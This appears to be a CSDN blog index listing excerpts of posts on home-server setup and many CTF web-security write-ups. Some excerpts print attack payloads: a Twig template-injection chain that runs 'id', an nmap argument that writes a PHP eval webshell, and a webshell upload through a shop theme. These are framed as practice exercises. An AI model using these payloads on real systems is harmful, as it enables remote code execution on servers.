自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

抒情诗

少就是多,慢就是快

  • 博客(71)
  • 资源 (4)
  • 收藏
  • 关注

原创 制作适用于openstack平台的win10镜像

选择增加硬件,选择win10系统iso镜像的路径(注意之前一开始新建虚拟机用的iso镜像是驱动镜像)可以看到压缩后的镜像只有5.3G。至此所有的步骤完成,镜像可以直接上传到openstack上使用了。经试验上面的命令是不行的,还是从图形界面启动虚拟机比较直观。关机,并执行下面的命令接口压缩。选择virtio作为ISO镜像。选择qcow2作为磁盘卷。一路下一步,到下面的界面。设备类型选择CDROM。修改disk的磁盘总线。硬盘已能被识别,下一步。加载virtio驱动。

2024-04-15 23:12:28 332

原创 Home Assistant OS转 Hassio Supervisor(docker 版本)

HAOS缺点:系统不是很好用,无法满足我在上面使用python开发插件的小需求(或许有方法满足,但是我没找到)。会生成如下一堆docker,执行完毕之后,打开IP:8123即可访问到HA系统。进入界面后点击从备份恢复即可恢复之前的界面。HAOS优点:方便安装,配置非常方便。配置-系统-备份-创建备份。备份上传后即可开始还原。

2024-04-15 19:57:51 225

原创 home assistant os安装docker

做智能家居的时候,需要使用home assistant的操作系统安装python,但是考虑到python安装比较复杂,且后续可能还要安装其他的环境,所以直接安装docker。由于ha的系统采用的是轻量级的操作系统(Alpine?在安装过docker之后,考虑安装docker-compose。失败了,重启之后所有软件都消失了。

2024-04-11 14:14:57 145

原创 supervisor守护python进程报FATAL错 spawn error

我们在使用supervisor守护使用虚拟python环境的时候可能会碰到如下的报错内容。问题出现的原因为在supervisor的配置文件中,我们使用了。查看这个进程的状态的时候,有可能还会返回包含一个。的方式来运行的python脚本。如下图所示,是我修改的内容。

2023-09-25 21:15:01 492

原创 Hack The Box - Web - Phonebook

玩一会儿htb的challenge,最近找工作,所以先玩玩web类型的。这道题目的类型有人说是LDAP注入、有人说是like注入。LDAP这玩意08年的时候估计可能比较流行,但是现在应该没多少人用了吧,比较小众。其实LDAP这个特殊的数据库是比较契合这个题目的,PhoneBook(电话本)嘛。但是根据别人的分析其实又不太像,暂时就认为这个是like类型的注入。有经验的师傅可以指点一下,不胜感激。看到论坛里分享的经验,这里可以使用下面几种方式来绕过登录。登录到后台之后有个搜索功能,如图2所示。

2023-06-17 16:36:55 394

原创 Weblogic SSRF 漏洞(CVE-2014-4210)

Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。上图框住的容器里面运行的应该是一个docker内网中的redis容器,鉴于解决此问题的时间成本太高(没见到过遇到这个问题的),这里不再对redis未授权进行利用。

2023-05-18 01:49:13 526

原创 2017-赛客夏令营-Web-injection

看题目名字,应该是一道SQL注入。首先,根据下面的payload,1=1时返回为错误界面,1=2时返回正确界面,判断是数字型布尔盲注。使用sqlmap可以解决,这里方便起见就不写脚本浪费时间了。跑出结果。

2023-05-08 18:13:00 160

原创 2017-赛客夏令营-Web-weakphp

敏感文件泄露,访问路径,会发现403,说明存在git泄露。使用exp将源码dump到本地。只有一个index.php的文件,内容如下这是我当时打ctf时比较流行的php md5弱类型比较,此时有两种解法。

2023-05-08 17:33:10 154

原创 N1Book-第一章Web入门-举足轻重的信息搜集-常见的搜集

本题为Nu1L团队编著的《从0到1:CTFer成长之路》配套题目。来源网站:https://book.nu1l.com/ 题目一共3部分flag使用dirsearch进行目录扫描。

2023-05-08 17:07:58 228

原创 N1Book-第一章Web入门-举足轻重的信息搜集-粗心的小李

本题为Nu1L团队编著的《从0到1:CTFer成长之路》配套题目。来源网站:https://book.nu1l.com/dump下来的index.html源码里面包含了flag。也是比较老的考点了,访问。使用工具dump源码。

2023-05-08 16:18:30 177

原创 2017-赛客夏令营-Web-checkin

毕竟是17年的比赛,而且是签到题,注意检查响应头即可。

2023-05-08 15:48:23 90

原创 2017-赛客夏令营-Web-random

如题,守株待兔即可,可能考察的是初级的编写python脚本的能力。

2023-05-08 15:45:00 55

原创 N1Book-第一章Web入门-任意文件读取漏洞-afr_1

这个是传统的任意文件读取漏洞,可以利用php的本地文件包含(Local File Include)实现,使用php的伪协议进行文件读取;或者利用php文件读取函数。本题为Nu1L团队编著的《从0到1:CTFer成长之路》配套题目。来源网站:https://book.nu1l.com/这里可能没有include文件包含,而是使用。没源码不好分析,这里应该逻辑也不大难。造成的文件读取漏洞。

2023-05-08 15:36:14 299

原创 N1Book-第一章Web入门-任意文件读取漏洞-afr_2

由于Nginx配置不当产生了目录穿越漏洞。本题使用的是OpenResty,而OpenResty是基于Nginx与Lua实现的,所以Nginx存在的漏洞,OpenResty同样也可能存在。而且这不是代码里面的漏洞,配置漏洞的话大概率是被放在危险性比较低的位置上的。

2023-05-08 14:45:19 645

原创 windows右键增加【新建md】

看了好几个解决方案,都是需要修改注册表的,具体的操作过程如下:右键添加空md文件win+r 输入regedit进入注册表HKEY_CLASSES_ROOT下创建项,命名为.md,如已有此项则忽略这一步骤默认值设置为 .md然后在.md目录下新建项,名字为ShellNew,在ShellNew中新建字符串值,名字为NullFile,值为空。这样出现的效果就是新建了一个空的md文件,名字在新建的时候可以自定义,如果有添加markdown模板的需要的话,只需要再进行一步操作,如下:右键添加模板md

2022-04-22 13:43:35 315

原创 wireshark学习之计网数据报头分析

前言最近学习计网需要使用到wireshark,但是没认真分析过这个wireshark的数据报,现在也正好学习一下wireshark关联计网计网给出的数据记录的表格为我会一个一个地在wireshark中标出这些数据的位置1. 版本这个说的应该是网络协议IPV4的版本?这个wireshark里面直接就有这个字段,位置如下所示:2. 首部长度(Header Length)这个字段wireshark也有,就在版本的后面:3. 服务类型这里的服务类型好像代表的不是Differentiated

2021-12-10 23:35:44 2111 1

原创 ASP.NET MVC程序设计教程上机练习题目 练习5—带数据库的复杂表单交互

前言这次的实验涉及到了一个比较特殊的数据库操作,就是需要添加一个比较复杂的前端的表单交互操作,在原先的form表单的基础之上添加一个单选框,一个复选框即可。一、添加单选框这个比较简单,再原先的基础之上再添加一个formgroup即可,使用强类型来绑定数据(似乎是,好像就是那个lamda表达式那里)。<div class="form-group"> <label class="col-md-2 control-label">性别:</label>

2021-12-04 23:32:08 574 1

原创 JavisOJ 密码学解题笔记

文章目录楔子、前言一、[xman2019]xgm1. 简单分析2.python脚本求flag楔子、前言想深入学习一下密码学的相关知识,以及这些密码学的知识在CTF比赛中的应用,所以就有了这一篇刷题笔记。我会将Tag写到每个单独的题的最上面一、[xman2019]xgm共模攻击1. 简单分析n1=2166019093101327055948798314196634727966604446857200032562828257859511910184091779461773353599597671

2021-11-21 01:10:29 2816

原创 2021年11月逆向练习

前言最近每天打游戏,现在脑子里都快出现幻觉了,决定学习一段时间冷静一下脑子,下次打游戏务必冷静,每天打游戏不能超过60分钟!今天到月末,我一有空就会刷一会儿逆向题目来学习一下,每天至少要做一道逆向题目,也就是说到本月末要做至少13道题目,目标不大,现就这样吧。一、BugKu-Timer(阿里CTF)1. 简单分析安装之后发现是一个倒计时,倒计时的初始数值非常大哈。那再拿到jadx-gui里面康康,发现内部加载了so文件,将apk文件以压缩包的形式打开之后拉出来一个so文件逆一下。ida32位打开s

2021-11-18 01:06:21 1782

原创 python之Gooey图形界面使用

楔子、前言最近一个项目需要用到python图形界面的快速开发,还要求在我们可以看到的代码上看不到类和对象的使用痕迹,这里直接先把pyqt排除了,pyqt臃肿且复杂,比较适合大型界面开发,小型界面开发再使用这个东西,学习成本极大(因为无法使用designer工具,这个designer生成的代码是有类的)。然后这里考虑使用tkinter或者gooey,这里我先尝试了tkinter,感觉不是特别美观,那就直接再次尝试Gooey这个框架的使用。开发的是一个python图形界面的网易云音乐下载播放器,播放为直接运

2021-11-16 19:40:01 5930 13

原创 ASP.NET MVC程序设计教程上机练习题目 练习7—数据库操作

要实现的目标:实现code first,即设置数据库初始化策略(书上有)实现一个类似于校园网上的公告类似的网站公告的内容要求可以点进去(链接里面有内容)可对公告的内容进行一个更改(选做)实现功能一首先就是code first的策略了,这个需要先创建数据库,那就需要先对数据库中的字段进行一个预想,表中的公告需要一个id值(int 类型)需要title值(nvarchar 类型)需要具体的content(nvarchar 类型)1.创建数据库、数据表创建表的命令为:CREA

2021-11-15 01:22:44 917

原创 2021-3-18_js原型链之_[GYCTF2020]Ez_Express

这题是第一次接触到的js原型链,学得太慢了新手学习,不免有错漏。js的原型链污染就是js在调用数组下标或者对象的属性的时候如果没有在自己这里发现相关的就会自动向上查找,emmm因为js中一切皆对象,一个对象的__proto__还是一个对象,对象.__proto__就叫做对象的原型?好像是这样。然后会一直向上查找知道找到Object的原型为null似乎是,然后他向上查找的这条链就叫做JavaScript的原型链。我们这里要用的原型链污染其实就是因为,如果JavaScript代码之中有一个东西没有经过定义并

2021-03-18 01:12:06 383

原创 HackTheBox注册&misc签到

太菜了,做点游戏玩玩吧邀请码获得进入首页,在console控制台输入makeInviteCode()得到一串base64data: "SW4gb3JkZXIgdG8gZ2VuZXJhdGUgdGhlIGludml0ZSBjb2RlLCBtYWtlIGEgUE9TVCByZXF1ZXN0IHRvIC9hcGkvaW52aXRlL2dlbmVyYXRl"enctype: "BASE64"把base64解一下码得In order to generate the invite code, mak

2021-03-17 00:08:39 573

原创 汇编语言与接口技术作业

第四章 80x86汇编语言程序设计1.伪指令语句与硬指令语句的本质区别是什么?伪指令有什么主要作用?答:区别:伪指令语句是能执行的语句,硬指令语句是CPU可以执行的语句。伪指令语句主要作用是为汇编程序提供解释说明,它仅仅是在汇编过程中告诉汇编程序如何进行汇编。7.假设MYWORD是一个字变量,MYBYTE1和MYBYTE2是两个字节变量,指出下列语句中的错误及其原因。1.MOV BYTE PTR[BX], 1000答:数据类型不匹配,目的地址单元是字节单元,1000大于255。无法存放。

2020-12-31 13:03:14 7182 7

原创 【SWPUCT 2018】SimplePHP

tags: [phar反序列化, ctf, web]拿下代码先通过查看文件的功能拿下全部的文件代码,分别是index.php、base.php、file.php、upload_file.php、function.php、class.php。然后粗略看下代码,有个提示(不知道是不是后面放上去的),就是class.php那里。<?phpclass C1e4r{ public $test; public $str; public function __construct($

2020-10-23 22:54:38 369

原创 CISCN2019_华北赛区_Day1_Web1-Dropbox

好长时间没做web了,web狗太难了首先得检讨一下,我竟然将近三天没做web题目了,这这这还是一个web狗应该做的吗?反思一下呜呜呜。。。phar反序列化什么是phar反序列化呢?下面的文章可能会有点帮助来自jianshu按照我的理解来说呢,就是把危险的文件上传到服务器?然后借助某些功能与危险函数实现危险的操作,太笼统了。具体来说呢就是php文件系统中很大一部分的函数在通过phar://解析时,存在着对meta-data(在这里<meta-data>区域面搞反序列化的pop链)反序列化

2020-10-23 00:46:15 319

原创 攻防世界 Web_php_unserialize

我php序列化流程搞得太差了,现在做点反序列化的题好好地学习一下。就在攻防世界找到了这个题。。代码<?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this-&gt

2020-10-17 23:55:30 157 1

原创 DVWA渗透测试初级练习(Command injection)更新中

下面的内容是我2020年后半年进行的简单的dvwa的渗透实验,顺序可能会有一些问题,但是内容我一定会搞完整,DVWA渗透环境的windows10配置phpstudyCommand Injection(命令注入)命令注入是什么?自己百度百科吧,简单地用我的理解来说呢就是利用程序员的各种不安全的功能,不安全的函数实现的,具体就看我的操作吧...

2020-10-13 11:34:25 268 1

原创 洛谷1001超级玛丽

c++用的IDE都是codeblocks,编译器为MingW果然入门,代码如下#include <iostream>using namespace std;int main(){ cout << " ********" << endl; cout << " ************" << endl; cout << "

2020-09-11 22:09:11 121

原创 2020/7/27 - [watevrCTF-2019]Cookie Store - 伪造cookie

一开始还以为这是一个很难的题目,没想到就是一个简单的COOkIe伪造。1.伪造cookie根据他的题目提示,这可能是一道伪造cookie的题,所以先用burpsuIte进行抓包。买这个一块钱的先试一下,结果:很明显看到了我们剩余的钱数是50,改成500,再把post的数据id=0改为id=2用来买我们的3号商品flag。2.获得flagforward之后有如下内容:很明显session是一个base64,直接解码后获得flag...

2020-07-27 20:14:49 1043

原创 2020/7/21 - [GKCTF2020]老八小超市 - 弱密码、木马上传、间接非正常提权

这是个简单的实体环境了,这个弱密码起到了很大的作用文章目录1.弱密码2.下载主题3.上传木马4.连接木马1.弱密码shopxo管理员好像有两个,一个是admin(超级管理员),另一个是shopxo(一般管理员),他们的密码都是shopxo,一句话,弱密码真恶心。2.下载主题下载第一个默认主题,不要钱的直接下。3.上传木马搞个一句话安装主题,当主题转为1.8.1就安装成功了,我们的一句话也就上传成功了。4.连接木马由此推测我们的一句话上传到的位置为http://d6f0faff-

2020-07-21 22:45:55 290

原创 2020/7/21 - [ASIS 2019]Unicorn shop - unicode编码漏洞

有印象,但是不太清楚怎么找到值大于1337.0的值,后来看到wp里写到一个网站可以找到,开始我还试了sql注入,但是可能后台并没有连接数据库,然后想到可能要买4号独角兽就能获得flag。但是直接买flag会报错,报错内容如下可以看到只能输入一个字符,但是这个字符的值还得大于1337,在下面这个网站搜素thousand就能找到值大于1337的字符。这是个英文网站,所以要搜thousand然后找UTF-8 Encoding:,在下面输入编码值就行了,把0x换为%就行了(中间没空格)获得flag

2020-07-21 13:58:36 493

原创 2020/7/20 -[BJDCTF 2nd]xss之光 - git源码泄露、php原生类反序列化

又回来了,当初看不懂,现在看起来也很nb(Exception类没了解过)首先是个git源码泄露,开始用dirsearch扫的时候很快,但全是429,后来用了-s 延迟(单位:s)选项成功扫出.git泄露。亲自实验-s 0.5也可以,稍微快了点。用githack下载源码,index.php内容如下所示<?php$a = $_GET['yds_is_so_beautiful'];echo unserialize($a);说他是反序列化吧,我没见过这种形式的,也不太清楚;说他不是反序列化

2020-07-20 22:08:13 568

原创 2020/7/19 - [BJDCTF2020]Cookie is so stable - twg服务器端模板注入

这是道服务器端模板注入,过段时间总结一下各种payload到一篇文章里。测试ssti漏洞的payload为{{7*'7'}}如果返回的是49就是twg注入,7777777是jinja2(这个我还没实验,摘自他人文章)返回的是49,说明是twg模板,下面是固定的测试twg注入的payload,一篇文章带你理解漏洞之 SSTI 漏洞{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

2020-07-20 11:01:24 367

原创 2020/7/17 - [CISCN2019 华东北赛区]Web2 - xss、html markup、SQL注入

做一道复杂的题锻炼一下文章目录1.判断是xss2.盗cookie的payload3.SQL注入获得flag1.判断是xss这是一个类似博客的界面,而博客常见的漏洞就是xss,通过让别人浏览或者点击某处盗取身份。由此处大概能感觉到是xss了,在内网xss平台弄(第二次搞xss,第一次是在pikachu上面弄的)。2.盗cookie的payload看了一下wp,因为我对xss并不是很熟悉,他们说要自动触发,需要把payload略改一下,改成下面。(function(){window.locat

2020-07-17 16:55:31 299

原创 2020/7/16 - [CISCN2019 华北赛区 Day1 Web2]ikun - admin伪造、python之pickle反序列化

文章目录1.跑出Lv6所在page2.购买lv63.伪造admin1.跑出Lv6所在page根据提示要找LV6,再根据以下写脚本。import requests;url = 'http://d046240b-eee3-43a5-9b18-5a87217af228.node3.buuoj.cn/shop?page='for i in range(0,1000): r = requests.get(url + str(i)) if 'lv6.png' in r.text:

2020-07-16 22:46:02 347

原创 2020/7/15 - [BJDCTF2020]ZJCTF,不过如此 - 伪协议、preg_replace /e模式命令执行

文章目录1.代码审计2.base后,再审计3.payload根据开始的时候主页面给得php代码1.代码审计<?phperror_reporting(0);$text = $_GET["text"];$file = $_GET["file"];if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_conten

2020-07-16 11:06:10 440

原创 2020/7/15 - [网鼎杯 2020 朱雀组]Nmap - nmap写入webshell

这个题和前几天做的online tools有异曲同工之妙啊。都是在线工具类的漏洞。本文思路1127.0.0.1' <?=eval($_POST[a]);?> -oG 1.phtml

2020-07-15 19:29:50 628

原创 2020/7/14 - [MRCTF2020]PYWebsite - 伪造ip

简单题不多了,往后要开始学知识点做难题了1.查看源码主页面没啥思路,看不明白,那就再看看源码。看看flag.php页面的内容,里面是提示显然提示的是自己也可以看到flag的内容,所以我们可以伪造ip用x-forwarded-for:127.0.0.1得到flag了flagflag{9d6e5cc7-e3b4-4585-bae7-671e2edc0e1a}...

2020-07-14 21:23:00 523

原创 2020/7/13 - [MRCTF2020]Ez_bypass - php松散比较、md5()不识别数组

这个我自己就会,哈哈,真爽1.知识点知识点内容1md5()识别数组为null2松散比较(123 == 123a )2.payload这都是些很简单的知识点。在网上随便一搜都能搜得到的那种,所以就不再写到博客里了。方式内容url(get)?id[]=1&gg[]=2postpasswd=1234567aok啦,下面是个小妙招如果你的页面显示的内容排得很乱,试一下用f12或查看源代码效果对比就像这样...

2020-07-13 22:44:49 473 1

安卓开发之制作一个自己的博客App

实现就是一个webview还有一个启动动画,仅供学习。首先要有自己的一个博客网站嗷

2021-04-16

WiperSoft-installer.exe

比官网稍微快一点,只要五个积分ao,节省大把时间

2021-03-02

Ziperello.zip

这个已经是比较专业的压缩包解密软件了额。网上有相关的使用教程,需要的自己可以去查哈哈

2020-04-14

antsword蚁剑の加载器&源码

因为这个蚁剑 的源码在线下载的速度实在太慢了,这里分享了一下这个蚁剑的加载器与源码,直接加载就行了,网络上有相关的安装教程。压缩包里有两个文件哦!

2020-04-14

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除